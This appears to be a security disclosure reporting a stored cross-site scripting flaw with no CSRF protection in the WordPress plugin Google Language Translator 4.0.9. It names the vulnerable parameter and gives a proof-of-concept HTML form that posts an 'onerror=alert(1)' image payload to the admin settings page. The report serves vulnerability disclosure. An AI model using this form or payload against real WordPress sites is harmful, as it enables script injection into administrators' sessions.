Hello,

Plugin: Google Language Translator 4.0.9 https://wordpress.org/plugins/google-language-translator/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=google_language_translator

Vulnerable parameter: googlelanguagetranslator_flags_order

Example PHP callstack:

google_language_translator::page_layout_cb   [/google-language-translator/google-language-translator.php:1128]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=google_language_translator">

<input type="text" name="googlelanguagetranslator_flags_order" value="<img src=x onerror=alert(1) />" />

<input type="submit" />

</form>

--